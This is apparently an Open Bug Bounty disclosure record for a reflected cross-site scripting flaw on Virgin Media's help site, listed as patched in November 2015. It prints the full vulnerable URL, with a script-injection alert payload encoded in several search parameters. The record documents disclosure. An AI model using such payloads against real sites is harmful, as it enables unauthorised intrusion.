help.virginmedia.com XSS vulnerability

2015-11-04T06:46:00
ID OBB:100688
Type openbugbounty
Reporter Spam404
Modified 2015-11-04T06:48:00

Description

Vulnerable URL:
https://help.virginmedia.com/system/selfservice.controller?criterion=kb%3A%3Aarticle_search_data%23name%23string_text%23all_of_these%23%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSSPOSED%27%29%3C%2Fscript%3E%23or%24kb%3A%3Aarticle_search_data%23article_key_words%23string_text%23all_of_these%23%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSSPOSED%27%29%3C%2Fscript%3E%23or%24&pageSize=10&CMD=ADV_SEARCH&KEYWORDS=%3C%2Fscript%3E%3Cscript%3Ealert%24%27XSSPOSED%27%24%3C%2Fscript%3E&TOPIC_NAME=All+topics&SUBTOPIC_NAME=All+Subtopics&subTopicType=0&BOOL_SEARCHSTRING=+%26wtquote%3B%3C%2Fscript%3E%3Cscript%3Ealert%26wtquote%3B++and++%28++%26wtquote%3B%27XSSPOSED%27%26wtquote%3B++%29++and++%26wtquote%3B%3C%2Fscript%3E%26wtquote%3B+&SIDE_LINK_TOPIC_ID=&SIDE_LINK_SUB_TOPIC_ID=&EXPANDED_TOPIC_TREE_NODES=&VM_CUSTOMER_TYPE=Cable&VM_CUSTOMER_TYPE=National&searchString=%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSSPOSED%27%29%3C%2Fscript%3E&searchStringDummy=%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSSPOSED%27%29%3C%2Fscript%3E&USERTYPE=1&CONFIGURATION=1001&PARTITION_ID=1&TIMEZONE_OFFSET=

Details:

Description| Value
---|---
Patched:| Yes, at 25.11.2015
Latest check for patch:| 25.11.2015 07:04 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 5
VIP website status:| No
Check help.virginmedia.com SSL connection:| (Grade: A-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 4 November, 2015 06:46 GMT
Vulnerability existence verified and confirmed| 4 November, 2015 06:48 GMT